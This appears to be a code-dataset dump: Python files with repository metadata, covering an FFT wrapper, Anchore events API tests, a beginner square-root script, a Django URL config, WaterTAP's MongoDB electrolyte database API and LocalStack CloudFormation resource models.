                outp = self.fftw.create_aligned_array(n, dtype=self.tpcplx)
                plan = self.fftw.Plan(inp, outp, direction='forward', flags=('measure' if measure else 'estimate',))
                return (plan,None,None)

        class rfftp(fftpool):
            # Forward real-to-complex FFT; output has n//2+1 bins.
            def __init__(self, measure=False, dtype=float):
                fftpool.__init__(self, measure, dtype=dtype)
            def init(self, n, measure, outn):
                inp = self.fftw.create_aligned_array(n, dtype=self.tpfloat)
                outp = self.fftw.create_aligned_array(n//2+1, dtype=self.tpcplx)
                plan = self.fftw.Plan(inp, outp, direction='forward', realtypes='halfcomplex r2c',flags=('measure' if measure else 'estimate',))
                return (plan,None,None)

        class ifftp(fftpool):
            # Inverse complex FFT; post-scales by 1/len to normalize (FFTW
            # transforms are unnormalized).
            def __init__(self, measure=False, dtype=float):
                fftpool.__init__(self, measure, dtype=dtype)
            def init(self, n, measure, outn):
                inp = self.fftw.create_aligned_array(n, dtype=self.tpcplx)
                outp = self.fftw.create_aligned_array(n, dtype=self.tpcplx)
                plan = self.fftw.Plan(inp, outp, direction='backward', flags=('measure' if measure else 'estimate',))
                return (plan,None,lambda x: x/len(x))

        class irfftp(fftpool):
            # Inverse complex-to-real FFT; `outn` gives the output length
            # (defaults to (n-1)*2); post-scales by 1/len to normalize.
            def __init__(self, measure=False, dtype=float):
                fftpool.__init__(self, measure, dtype=dtype)
            def init(self, n, measure, outn):
                inp = self.fftw.create_aligned_array(n, dtype=self.tpcplx)
                outp = self.fftw.create_aligned_array(outn if outn is not None else (n-1)*2, dtype=self.tpfloat)
                plan = self.fftw.Plan(inp, outp, direction='backward', realtypes='halfcomplex c2r', flags=('measure' if measure else 'estimate',))
                return (plan,lambda x: x[:n],lambda x: x/len(x))

        realized = True
if not realized:
    # fall back to numpy methods
    warn("nsgt.fft falling back to numpy.fft")

    class fftp:
        # Complex FFT via numpy. `measure`/`dtype`/`outn`/`ref` are accepted
        # only for API compatibility with the fftw3-backed classes above.
        def __init__(self, measure=False, dtype=float):
            pass
        def __call__(self,x, outn=None, ref=False):
            return np.fft.fft(x)

    class ifftp:
        # Inverse complex FFT via numpy; `n` optionally sets output length.
        def __init__(self, measure=False, dtype=float):
            pass
        def __call__(self,x, outn=None, n=None, ref=False):
            return np.fft.ifft(x,n=n)

    class rfftp:
        # Real-input FFT via numpy.
        def __init__(self, measure=False, dtype=float):
            pass
        def __call__(self,x, outn=None, ref=False):
            return np.fft.rfft(x)

    class irfftp:
        # Inverse real FFT via numpy; `outn` gives the output length.
        def __init__(self, measure=False, dtype=float):
            pass
        def __call__(self,x,outn=None,ref=False):
            return np.fft.irfft(x,n=outn)
| 38.766917 | 146 | 0.547905 |
40806a6f629246748e283409d4b31145ef0a795c | 3,307 | py | Python | tests/functional/services/api/events/test_get.py | dspalmer99/anchore-engine | 8c61318be6fec5d767426fa4ccd98472cc85b5cd | [
"Apache-2.0"
] | null | null | null | tests/functional/services/api/events/test_get.py | dspalmer99/anchore-engine | 8c61318be6fec5d767426fa4ccd98472cc85b5cd | [
"Apache-2.0"
] | null | null | null | tests/functional/services/api/events/test_get.py | dspalmer99/anchore-engine | 8c61318be6fec5d767426fa4ccd98472cc85b5cd | [
"Apache-2.0"
] | null | null | null | from datetime import datetime, timedelta
import pytest
from tests.functional.services.api.conftest import USER_API_CONFS
from tests.functional.services.api.subscriptions import SUBSCRIPTION_TYPES
from tests.functional.services.utils.http_utils import http_get, APIResponse
# Anchore Engine service names used as `source_servicename` filter values in
# the parametrized event-listing tests below.
SERVICES = ['analyzer', 'api', 'catalog', 'simpleq', 'policy-engine', 'rbac-authorizer', 'rbac-manager', 'reports',
            'notifications', 'feeds']
def get_event_id_from_list_resp(list_resp):
    """Return the ``generated_uuid`` of the first event in a list-events response body.

    Args:
        list_resp: Parsed JSON body of a ``GET /events`` response.

    Returns:
        The first result's ``generated_uuid``, or None when the response has
        no results (or the first result lacks the field).
    """
    # Bug fix: the previous default of {} for 'results' raised KeyError(0)
    # when indexed with [0]; a one-element list of an empty dict degrades
    # gracefully to None instead.
    results = list_resp.get('results') or [{}]
    return results[0].get('generated_uuid')
@pytest.mark.parametrize('api_conf', USER_API_CONFS)
class TestEventsAPIGetReturns200:
    """Smoke tests asserting every supported /events query returns HTTP 200."""

    def test_list_events(self, api_conf):
        resp = http_get(['events'], {'page': 1, 'limit': 1}, config=api_conf)
        assert resp == APIResponse(200)

    @pytest.mark.parametrize('source', SERVICES)
    def test_list_events_with_source_servicename(self, api_conf, source):
        resp = http_get(['events'], {'source_servicename': source, 'page': 1, 'limit': 1}, config=api_conf)
        assert resp == APIResponse(200)

    def test_list_events_with_source_hostid(self, api_conf):
        # Bug fix: this method previously re-used the name
        # test_list_events_with_source_servicename, which shadowed the
        # parametrized service-name test above so it was never collected.
        resp = http_get(['events'], {'source_hostid': 'anchore-quickstart', 'page': 1, 'limit': 1}, config=api_conf)
        assert resp == APIResponse(200)

    @pytest.mark.parametrize('e_type', SUBSCRIPTION_TYPES)
    def test_list_events_with_event_type(self, api_conf, e_type):
        resp = http_get(['events'], {'event_type': e_type, 'page': 1, 'limit': 1}, config=api_conf)
        assert resp == APIResponse(200)

    @pytest.mark.parametrize('r_type', ['image_tag', 'imageDigest', 'repository'])
    def test_list_events_with_resource_type(self, api_conf, r_type):
        resp = http_get(['events'], {'resource_type': r_type, 'page': 1, 'limit': 1}, config=api_conf)
        assert resp == APIResponse(200)

    def test_list_events_with_resource_id(self, api_conf):
        resp = http_get(['events'], {'resource_id': 'docker.io/alpine:latest', 'page': 1, 'limit': 1}, config=api_conf)
        assert resp == APIResponse(200)

    @pytest.mark.parametrize('level', ['INFO', 'ERROR'])
    def test_list_events_with_level(self, api_conf, level):
        resp = http_get(['events'], {'level': level, 'page': 1, 'limit': 1}, config=api_conf)
        assert resp == APIResponse(200)

    def test_list_events_with_since(self, api_conf):
        five_min_ago = str(datetime.now() - timedelta(minutes=5))
        resp = http_get(['events'], {'since': five_min_ago, 'page': 1, 'limit': 1}, config=api_conf)
        assert resp == APIResponse(200)

    def test_list_events_with_before(self, api_conf):
        resp = http_get(['events'],
                        {'before': str(datetime.now()), 'page': 1, 'limit': 1},
                        config=api_conf)
        assert resp == APIResponse(200)

    def test_list_event_types(self, api_conf):
        resp = http_get(['event_types'], config=api_conf)
        assert resp == APIResponse(200)

    def test_get_event_by_id(self, api_conf):
        # First list one event, then fetch it again by its generated_uuid.
        resp = http_get(['events'], {'page': 1, 'limit': 1}, config=api_conf)
        assert resp == APIResponse(200)
        event_id = get_event_id_from_list_resp(resp.body)
        resp = http_get(['events', event_id], config=api_conf)
        assert resp == APIResponse(200)
7a35c3fa34e5bd000e4106da71d97cc5e27560d5 | 739 | py | Python | Starter/Examples/06_def.py | MKarimi21/JADI-Python | b07b9ff93909cffd059aecbd91073398f7153da7 | [
"MIT"
] | 2 | 2020-09-08T20:41:55.000Z | 2021-09-09T10:25:04.000Z | Starter/Examples/06_def.py | MKarimi21/JADI-Python | b07b9ff93909cffd059aecbd91073398f7153da7 | [
"MIT"
] | null | null | null | Starter/Examples/06_def.py | MKarimi21/JADI-Python | b07b9ff93909cffd059aecbd91073398f7153da7 | [
"MIT"
] | null | null | null | # a program to calculate the square root with def
# Babylian Algorithm for Square
def Square(Number):
error = 0.001
guess = abs(Number / 2)
iteraion = 0
if Number <= 0:
Number = abs(Number)
print('Your Number is incorrect and agian run program whith abslute number')
else:
while (abs(Number-guess**2) > error):
iteraion = iteraion + 1
print('-> on iteration', iteraion, 'my guess is', guess)
tqs = Number / guess
guess = (tqs + guess) / 2
# Interactive driver: read a number N from the user, approximate sqrt(N),
# then repeat the computation for N squared.
Number = float(input('Give me N, I whill give you the Square(N) : '))
print('Your Number is = ', Number)
Square(Number)
Num2 = Number**2
print('Your Number ^2 is = ', Num2 )
Square(Number**2)
75851a61b331d51b7ded05e4e6bea37bc92f18f3 | 1,221 | py | Python | Yoga/Yoga/urls.py | cmadisonne/passion-project | ca9943d6d27e879a03e308b8ddb6e5d2eb89673b | [
"Apache-2.0"
] | null | null | null | Yoga/Yoga/urls.py | cmadisonne/passion-project | ca9943d6d27e879a03e308b8ddb6e5d2eb89673b | [
"Apache-2.0"
] | null | null | null | Yoga/Yoga/urls.py | cmadisonne/passion-project | ca9943d6d27e879a03e308b8ddb6e5d2eb89673b | [
"Apache-2.0"
] | null | null | null | """Yoga URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from YogaApp import views
from django.conf import settings
from django.conf.urls.static import static
# Route table mapping URL paths to YogaApp views, plus file-serving routes
# for STATIC_URL appended via static().
# NOTE(review): Django's static() helper serves files only in development
# (DEBUG=True) -- confirm production static-file serving is handled elsewhere.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.base, name='home'),
    path('about/', views.about, name='about'),
    path('schedule/', views.schedule, name='schedule'),
    path('community/', views.community, name='community'),
    path('contact/', views.contact, name='contact'),
    path('request/', views.request, name='request'),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
4fe5688468b28df63b8379eebaca22b60d928d47 | 19,120 | py | Python | watertap/edb/db_api.py | jalving/watertap | a89bd61deaaca9c30402727545e8223a276c93e6 | [
"BSD-3-Clause-LBNL"
] | null | null | null | watertap/edb/db_api.py | jalving/watertap | a89bd61deaaca9c30402727545e8223a276c93e6 | [
"BSD-3-Clause-LBNL"
] | null | null | null | watertap/edb/db_api.py | jalving/watertap | a89bd61deaaca9c30402727545e8223a276c93e6 | [
"BSD-3-Clause-LBNL"
] | null | null | null | ###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
"""
Database operations API
"""
# stdlib
import logging
import re
from typing import Dict, List, Optional, Union
# third-party
try:
import certifi
except ImportError:
certifi = None
from pymongo import MongoClient
from pymongo.errors import ConnectionFailure, ServerSelectionTimeoutError, PyMongoError
# package
from .data_model import Result, Component, Reaction, Base, DataWrapper
from .error import BadConfiguration
__author__ = "Dan Gunter (LBNL)"
_log = logging.getLogger(__name__)
class ElectrolyteDB:
    """Interface to the Electrolyte database.

    This uses MongoDB as the underlying data store.
    """

    # Default MongoDB connection settings.
    DEFAULT_HOST = "localhost"
    DEFAULT_PORT = 27017
    DEFAULT_URL = f"mongodb://{DEFAULT_HOST}:{DEFAULT_PORT}"
    DEFAULT_DB = "electrolytedb"

    # Default timeout, in ms, for sockets, connections, and server selection
    timeout_ms = 5000
    timeout_args = {
        "socketTimeoutMS": timeout_ms,
        "connectTimeoutMS": timeout_ms,
        "serverSelectionTimeoutMS": timeout_ms,
    }

    # make sure these match lowercase names of the DataWrapper subclasses in
    # the `data_model` module
    _known_collections = ("base", "component", "reaction")
def __init__(
self,
url: str = DEFAULT_URL,
db: str = DEFAULT_DB,
check_connection: bool = True,
):
"""Constructor.
Args:
url: MongoDB server URL
db: MongoDB 'database' (namespace) to use
check_connection: If True, check immediately if we can connect to the
server at the provided url. Otherwise defer this check until the
first operation (at which point a stack trace may occur).
Raises:
pymongo.errors.ConnectionFailure: if check_connection is True,
and the connection fails
"""
self._mongoclient_connect_status = {"initial": "untried", "retry": "untried"}
self._client = self._mongoclient(url, check_connection, **self.timeout_args)
if self._client is None:
msg = self.connect_status_str
_log.error(msg)
raise ConnectionFailure(msg)
self._db = getattr(self._client, db)
self._db = getattr(self._client, db)
self._database_name = db
self._server_url = url
def is_empty(self) -> bool:
if self._database_name not in self._client.list_database_names():
return True
collections = set(self._db.list_collection_names())
if not collections:
return True
if not {"base", "component", "reaction"}.intersection(collections):
_log.warning(
"Bootstrapping into non-empty database, but without any EDB collections"
)
return True
return False
@staticmethod
def drop_database(url, db):
"""Drop a database.
Args:
url: MongoDB server URL
db: Database name
Returns:
None
Raises:
anything pymongo.MongoClient() can raise
"""
client = MongoClient(host=url)
client.drop_database(db)
@classmethod
def can_connect(cls, url=None, db=None) -> bool:
"""Convenience method to check if a connection can be made without having
to instantiate the database object.
Args:
url: Same as constructor
db: Same as constructor
Returns:
True, yes can connect; False: cannot connect
"""
url = url or f"mongodb://{cls.DEFAULT_HOST}:{cls.DEFAULT_PORT}"
db = db or cls.DEFAULT_DB
result = True
try:
_ = cls(url=url, db=db, check_connection=True)
except ConnectionFailure:
result = False
return result
def _client_can_connect(self, client: MongoClient) -> bool:
# NOTE the "ping" command is chosen because it's the only one available when using mocked MongoClient instances
# therefore, having a single commands that works for both mock- and non-mock objects makes the mocking easier
server_resp = client.admin.command("ping")
try:
return bool(server_resp["ok"])
except (KeyError, TypeError) as e:
_log.exception(f"Unexpected format for server response: {server_resp}")
return None
    def _mongoclient(self, url: str, check, **client_kw) -> Union[MongoClient, None]:
        """Create a MongoClient for ``url``, optionally verifying connectivity.

        If the first connectivity check fails with a certificate-verification
        error and ``certifi`` is importable, the connection is retried with an
        explicit CA bundle. Outcomes are recorded in
        ``self._mongoclient_connect_status`` under "initial" and "retry".

        Returns:
            The client, or None if all connection attempts failed.
        """
        _log.debug(f"Begin: Create MongoDB client. url={url}")
        mc = MongoClient(url, **client_kw)
        if not check:
            _log.info(f"Skipping connection check for MongoDB client. url={url}")
            _log.debug(f"End: Create MongoDB client. url={url}")
            return mc
        # check that client actually works
        _log.info(f"Connection check MongoDB client url={url}")
        try:
            if self._client_can_connect(mc):
                self._mongoclient_connect_status["initial"] = "ok"
                _log.info("MongoDB connection succeeded")
        except ConnectionFailure as conn_err:
            mc = None
            self._mongoclient_connect_status["initial"] = str(conn_err)
            if "CERTIFICATE_VERIFY_FAILED" in str(conn_err):
                _log.warning(f"MongoDB connection failed due to certificate "
                             f"verification.")
                if certifi is not None:
                    _log.info("Retrying MongoDB connection with explicit location "
                              f"for client certificates ({certifi.where()})")
                    try:
                        # Retry with certifi's CA bundle as the TLS trust store.
                        mc = MongoClient(url, tlsCAFile=certifi.where(), **client_kw)
                        if self._client_can_connect(mc):
                            # NOTE(review): a successful retry never sets
                            # status["retry"] = "ok", so connect_status_str
                            # cannot report the retry success -- confirm
                            # whether that is intended.
                            _log.info("Retried MongoDB connection succeeded")
                    except ConnectionFailure as err:
                        mc = None
                        self._mongoclient_connect_status["retry"] = str(err)
                        _log.error(self.connect_status_str)
        _log.debug(f"End: Create MongoDB client. url={url}")
        return mc
@property
def connect_status(self) -> Dict:
return self._mongoclient_connect_status.copy()
@property
def connect_status_str(self) -> str:
e = self._mongoclient_connect_status
if e["initial"] == "ok":
return "Connection succeeded"
if e["retry"] == "ok":
return "Initial connection failed, but retry succeeded"
return f"Initial connection error ({e['initial']}), retry error ({e['retry']})"
    @property
    def database(self):
        """Name of the MongoDB database this instance operates on."""
        return self._database_name
    @property
    def url(self):
        """Connection URL of the MongoDB server."""
        return self._server_url
def get_components(
self,
component_names: Optional[List[str]] = None,
element_names: Optional[List[str]] = None,
) -> Result:
"""Get thermodynamic information for components of reactions.
Args:
component_names: List of component names
element_names: List of element names (ignored if component_names is given)
Returns:
All components matching the criteria (or all if none specified)
"""
collection = self._db.component
if component_names:
query = {"$or": [{"name": n} for n in component_names]}
_log.debug(f"get_components. components={component_names} query={query}")
it = collection.find(filter=query)
elif element_names:
elt_set, elt_list = set(element_names), list(element_names)
# Find all components with at least one of the specified elements,
# then filter results to include only components where the elements
# are a subset of the specified elements (i.e., no 'other' elements).
it = (
doc
for doc in collection.find({"elements": {"$in": elt_list}})
if set(doc["elements"]) <= elt_set
)
else:
_log.debug(f"get_components. get all components (empty query)")
it = collection.find(filter={})
result = Result(iterator=it, item_class=Component)
return result
    def get_reactions(
        self,
        component_names: Optional[List] = None,
        phases: Union[List[str], str] = None,
        any_components: bool = False,
        include_new_components: bool = False,
        reaction_names: Optional[List] = None,
    ) -> Result:
        """Get reaction information.

        Args:
            component_names: List of component names
            phases: Phase(s) to include; if not given allow any.
            any_components: If False, the default, only return reactions where
                one side of the reaction has all components provided.
                If true, return the (potentially larger) set of reactions where
                any of the components listed are present.
            include_new_components: If False, the default, only return reactions where
                all given components are found in that reaction (and no new components)
                are used in that reaction.
            reaction_names: List of reaction names instead of component names

        Returns:
            All reactions containing any of the names (or all reactions,
            if not specified)
        """
        collection = self._db.reaction
        if component_names:
            found = []
            # normalize the `phases` argument to a set (or None = allow all)
            if phases is None:
                allow_phases = None
            elif isinstance(phases, str):
                allow_phases = {phases}
            else:
                allow_phases = set(phases)
            # build a set of normalized component names (spaces -> underscores)
            cnames = {c.replace(" ", "_") for c in component_names}
            _log.debug(
                f"Get reaction with {'any' if any_components else 'all'} "
                f"components {cnames}"
            )
            # Brute force table scan: need to restructure DB for this to be
            # easy to do with a MongoDB query, i.e. need to put all the
            # *keys* for stoichiometry.Liq as *values* in an array, then do a:
            # {$not: {$elemMatch: { $nin: [<components>] } } } on that array
            stoich_field = Reaction.NAMES.stoich
            for item in collection.find():
                # flatten the per-phase stoichiometry into one {species: coeff} dict
                stoich = {}
                disallow = False
                for phase in item[stoich_field].keys():
                    if allow_phases is not None and phase not in allow_phases:
                        disallow = True
                    for n in item[stoich_field][phase]:
                        stoich[n] = item[stoich_field][phase][n]
                # If the item involves a phase that is not allowed, then move on to next item
                if (disallow):
                    continue
                # If stoich is empty, then move on to next item
                if (stoich == {}):
                    continue
                if any_components:
                    # look for non-empty intersection
                    if set(stoich.keys()) & cnames:
                        found.append(item)
                else:
                    # ok if it matches both sides
                    if set(stoich.keys()) == cnames:
                        found.append(item)
                    # also ok if it matches everything on one side
                    else:
                        # Add a reaction if all the products/reactants
                        # can be formed. This allows addition of reactions
                        # that may include species not yet considered.
                        if (include_new_components == True):
                            # side is -1 for reactants, +1 for products
                            # NOTE(review): abs(v)/v assumes no stoichiometric
                            # coefficient is 0 (would raise ZeroDivisionError) -- confirm
                            for side in -1, 1:
                                side_keys = (k for k, v in stoich.items() if abs(v)/v == side)
                                if set(side_keys).issubset(cnames):
                                    found.append(item)
                                    break  # found; stop
                        # Otherwise, only include reactions that are subsets of
                        # the given component list
                        else:
                            if set(stoich.keys()).issubset(cnames):
                                found.append(item)
            it = iter(found)
        elif reaction_names:
            query = {"name": {"$in": reaction_names}}
            _log.debug(f"reaction query: {query}")
            it = collection.find(filter=query)
        else:
            it = collection.find()
        return Result(iterator=it, item_class=Reaction)
def get_base(self, name: str = None) -> Union[Result, Base]:
"""Get base information by name of its type.
Args:
name: Name of the base type.
Returns:
If no name is given, a Result iterator over all the bases.
Otherwise, a single `Base` object.
"""
if name:
query = {"name": name}
else:
query = {}
collection = self._db.base
result = Result(iterator=collection.find(filter=query), item_class=Base)
if name:
try:
return list(result)[0]
except IndexError:
raise IndexError("No bases found in DB")
else:
return result
def list_bases(self):
"""List the currently loaded bases and provide brief description
Args:
None
Returns:
No return, just display info to console
"""
for item in self.get_base():
print(f"base name: {item.name}\t\tdescription -> {self._base_desc(item.name)}")
def _base_desc(self, name) -> str:
"""Creates a description of a base based on the standard naming
Args:
name: Name of the base to describe
Returns:
desc: String of the description of the base
"""
if name == "default_thermo":
desc = "ThermoConfig: Default uses FTPx state vars for Liq phase"
elif name == "reaction":
desc = "ReactionConfig: Blank reaction template"
else:
items = name.split("_")
if len(items) < 3:
raise BadConfiguration("ElectrolyteDB._base_desc", self.get_base(name).idaes_config,
missing=None,why="\nName of base ("+name+") is of unknown format\n")
if items[0] == "thermo":
desc = "ThermoConfig: "
else:
desc = "ReactionConfig: "
desc += "uses " + items[-1] + " state vars for "
for i in range(1,len(items)-1):
desc += items[i] + ","
desc += " phases"
return desc
# older method name
get_one_base = get_base
def load(
self,
data: Union[Dict, List[Dict], DataWrapper, List[DataWrapper]],
rec_type: str = "base",
) -> int:
"""Load a single record or list of records.
Args:
data: Data to load, as a single or list of dictionaries or :class:`DataWrapper` subclass
rec_type: If input is a dict, the type of record. This argument is ignored if the input is
a subclass of DataWrapper.
Returns:
Number of records loaded
"""
is_object = False
if isinstance(data, DataWrapper):
data = [data]
is_object = True
elif isinstance(data, dict):
data = [data]
else:
is_object = isinstance(data[0], DataWrapper)
if is_object:
rec_type = data[0].__class__.__name__.lower()
else:
assert rec_type in self._known_collections
num = 0
for item in data:
coll = getattr(self._db, rec_type)
record = item.json_data if is_object else item
coll.insert_one(self.preprocess_record(record, rec_type))
num += 1
return num
    # XXX: This preprocessing overlaps with data_model.DataWrapper subclasses.
    # XXX: It should all be moved to one place
    @classmethod
    def preprocess_record(cls, record, rec_type):
        """Dispatch `record` to the matching `_process_<rec_type>` method and return the result."""
        process_func = getattr(cls, f"_process_{rec_type}")
        return process_func(record)
    @staticmethod
    def _process_component(rec):
        """Add the derived 'elements' list to a component record (mutated in place) and return it."""
        rec["elements"] = get_elements_from_components([rec["name"]])
        return rec
@staticmethod
def _process_reaction(rec):
rec["reactant_elements"] = get_elements_from_components(
rec.get("components", []))
# If reaction_order is not present in parameters, create it by
# copying the stoichiometry (or empty for each phase, if stoich. not found)
if Reaction.NAMES.param in rec:
param = rec[Reaction.NAMES.param]
if Reaction.NAMES.reaction_order not in param:
if Reaction.NAMES.stoich in rec:
param[Reaction.NAMES.reaction_order] = rec[
Reaction.NAMES.stoich].copy()
else:
param[Reaction.NAMES.reaction_order] = {
phase: {} for phase in Reaction.PHASES
}
return rec
    @staticmethod
    def _process_base(rec):
        """Base records require no preprocessing; returned unchanged."""
        return rec
@staticmethod
def _process_species(s):
"""Make species match https://jess.murdoch.edu.au/jess_spcdoc.shtml"""
m = re.match(r"([a-zA-Z0-9]+)\s*(\d*[\-+])?", s)
if m is None:
raise ValueError(f"Bad species: {s}")
symbols, input_charge = m.groups()
if input_charge is None:
charge = ""
elif len(input_charge) > 1:
# make 2+ -> +2
num = input_charge[:-1]
sign = input_charge[-1]
charge = f"{sign}{num}"
else:
charge = input_charge
# print(f"{s} -> {symbols}{charge}")
return f"{symbols}{charge}"
def get_elements_from_components(components):
    """Collect the unique chemical element symbols appearing in component names.

    An element symbol is taken to be an uppercase letter optionally followed
    by one lowercase letter. Two-letter matches beginning with "K" are
    skipped (presumably to avoid misreading equilibrium-constant style
    tokens such as "Ka"/"Kb" as elements -- TODO confirm intent).

    Args:
        components: Iterable of component name strings, e.g. ["NaHCO3"].

    Returns:
        List of unique element symbols (order unspecified).
    """
    elements = set()
    for comp in components:
        for match in re.finditer(r"[A-Z][a-z]?", comp):
            symbol = match.group(0)
            if not (symbol.startswith("K") and len(symbol) > 1):
                elements.add(symbol)
    return list(elements)
| 38.011928 | 119 | 0.565638 |
d6545145fc977d8eb294213f2c7fa32f42db76f5 | 67,845 | py | Python | localstack/services/cloudformation/service_models.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | localstack/services/cloudformation/service_models.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | localstack/services/cloudformation/service_models.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | import re
import json
import logging
from moto.ec2.utils import generate_route_id
from moto.s3.models import FakeBucket
from moto.sqs.models import Queue as MotoQueue
from moto.iam.models import Role as MotoRole
from moto.core.models import CloudFormationModel
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
from localstack.constants import AWS_REGION_US_EAST_1, LOCALHOST
from localstack.utils.aws import aws_stack
from localstack.utils.common import camel_to_snake_case, select_attributes
from localstack.services.cloudformation.deployment_utils import (
PLACEHOLDER_RESOURCE_NAME, remove_none_values, params_list_to_dict, lambda_keys_to_lower,
merge_parameters, params_dict_to_list, select_parameters, params_select_attributes)
LOG = logging.getLogger(__name__)
# name pattern of IAM policies associated with Lambda functions
LAMBDA_POLICY_NAME_PATTERN = 'lambda_policy_%s'
# ref attribute definitions
REF_ATTRS = ['PhysicalResourceId', 'Ref']
REF_ID_ATTRS = REF_ATTRS + ['Id']
REF_ARN_ATTRS = ['Ref', 'Arn']
class DependencyNotYetSatisfied(Exception):
    """ Exception indicating that a resource dependency is not (yet) deployed/available. """

    def __init__(self, resource_ids, message=None):
        # format the message from the raw argument, before list normalization
        super(DependencyNotYetSatisfied, self).__init__(
            message or 'Unresolved dependencies: %s' % resource_ids)
        # always store the unresolved IDs as a list
        self.resource_ids = resource_ids if isinstance(resource_ids, list) else [resource_ids]
class GenericBaseModel(CloudFormationModel):
    """ Abstract base class representing a resource model class in LocalStack.
    This class keeps references to a combination of (1) the CF resource
    properties (as defined in the template), and (2) the current deployment
    state of a resource.
    Concrete subclasses will implement convenience methods to manage resources,
    e.g., fetching the latest deployment state, getting the resource name, etc.
    """
    def __init__(self, resource_json, region_name=None, **params):
        self.region_name = region_name or aws_stack.get_region()
        self.resource_json = resource_json
        self.resource_type = resource_json['Type']
        # Properties, as defined in the resource template
        self.properties = resource_json.get('Properties') or {}
        # State, as determined from the deployed resource; use a special dict key here to keep
        # track of state changes within resource_json (this way we encapsulate all state details
        # in `resource_json` and the changes will survive creation of multiple instances of this class)
        self.state = resource_json['_state_'] = resource_json.get('_state_') or {}
    # ----------------------
    # ABSTRACT BASE METHODS
    # ----------------------
    def get_resource_name(self):
        """ Return the name of this resource, based on its properties (to be overwritten by subclasses) """
        return None
    def get_physical_resource_id(self, attribute=None, **kwargs):
        """ Determine the physical resource ID (Ref) of this resource (to be overwritten by subclasses) """
        return None
    # TODO: change the signature to pass in a Stack instance (instead of stack_name and resources)
    def fetch_state(self, stack_name, resources):
        """ Fetch the latest deployment state of this resource, or return None if not currently deployed. """
        return None
    # TODO: change the signature to pass in a Stack instance (instead of stack_name and resources)
    def update_resource(self, new_resource, stack_name, resources):
        """ Update the deployment of this resource, using the updated properties (implemented by subclasses). """
        # TODO: evaluate if we can add a generic implementation here, using "update" parameters from
        # get_deploy_templates() responses, and based on checking whether resource attributes have changed
        pass
    @classmethod
    def cloudformation_type(cls):
        """ Return the CloudFormation resource type name, e.g., "AWS::S3::Bucket" (implemented by subclasses). """
        return super(GenericBaseModel, cls).cloudformation_type()
    @staticmethod
    def get_deploy_templates():
        """ Return template configurations used to create the final API requests (implemented by subclasses). """
        pass
    # ----------------------
    # GENERIC BASE METHODS
    # ----------------------
    def get_cfn_attribute(self, attribute_name):
        """ Retrieve the given CF attribute for this resource (inherited from moto's CloudFormationModel) """
        # resolution order: (1) an `arn` attribute, (2) the physical resource
        # ID, (3) a matching key in the merged properties
        if attribute_name in REF_ARN_ATTRS and hasattr(self, 'arn'):
            return self.arn
        if attribute_name in REF_ATTRS:
            result = self.get_physical_resource_id(attribute=attribute_name)
            if result:
                return result
        props = self.props
        if attribute_name in props:
            return props.get(attribute_name)
        raise UnformattedGetAttTemplateException()
    # ----------------------
    # GENERIC UTIL METHODS
    # ----------------------
    def fetch_and_update_state(self, *args, **kwargs):
        """ Fetch the latest state via fetch_state() and merge it into self.state; returns the fetched state. """
        from localstack.utils.cloudformation import template_deployer
        try:
            state = self.fetch_state(*args, **kwargs)
            self.update_state(state)
            return state
        except Exception as e:
            # "not found" errors are expected for resources that are not yet deployed
            if not template_deployer.check_not_found_exception(e, self.resource_type, self.properties):
                LOG.debug('Unable to fetch state for resource %s: %s' % (self, e))
    def fetch_state_if_missing(self, *args, **kwargs):
        """ Fetch and cache the deployment state only if no state is cached yet. """
        if not self.state:
            self.fetch_and_update_state(*args, **kwargs)
        return self.state
    def set_resource_state(self, state):
        """ Set the deployment state of this resource. """
        self.state = state or {}
    def update_state(self, details):
        """ Update the deployment state of this resource (existing attributes will be overwritten). """
        details = details or {}
        self.state.update(details)
        return self.props
    @property
    def physical_resource_id(self):
        """ Return the (cached) physical resource ID. """
        return self.resource_json.get('PhysicalResourceId')
    @property
    def logical_resource_id(self):
        """ Return the logical resource ID. """
        return self.resource_json.get('LogicalResourceId')
    @property
    def props(self):
        """ Return a copy of (1) the resource properties (from the template), combined with
            (2) the current deployment state properties of the resource. """
        result = dict(self.properties)
        result.update(self.state or {})
        return result
    @property
    def resource_id(self):
        """ Return the logical resource ID of this resource (i.e., the ref. name within the stack's resources). """
        return self.resource_json['LogicalResourceId']
    @classmethod
    def update_from_cloudformation_json(cls,
            original_resource, new_resource_name, cloudformation_json, region_name):
        """ Copy template properties onto `original_resource`, trying the raw key,
            its lowercase form, and its snake_case form as attribute names. """
        props = cloudformation_json.get('Properties', {})
        for key, val in props.items():
            snake_key = camel_to_snake_case(key)
            lower_key = key.lower()
            for candidate in [key, lower_key, snake_key]:
                # snake_case is set unconditionally as a fallback, even if absent
                if hasattr(original_resource, candidate) or candidate == snake_key:
                    setattr(original_resource, candidate, val)
                    break
        return original_resource
    @classmethod
    def create_from_cloudformation_json(cls, resource_name, resource_json, region_name):
        """ Construct a model instance from the resource's CloudFormation JSON. """
        return cls(resource_name=resource_name, resource_json=resource_json, region_name=region_name)
    @classmethod
    def resolve_refs_recursively(cls, stack_name, value, resources):
        """ Resolve Ref/Fn:: intrinsics inside `value` against the stack's resources. """
        # TODO: restructure code to avoid circular import here
        from localstack.utils.cloudformation.template_deployer import resolve_refs_recursively
        return resolve_refs_recursively(stack_name, value, resources)
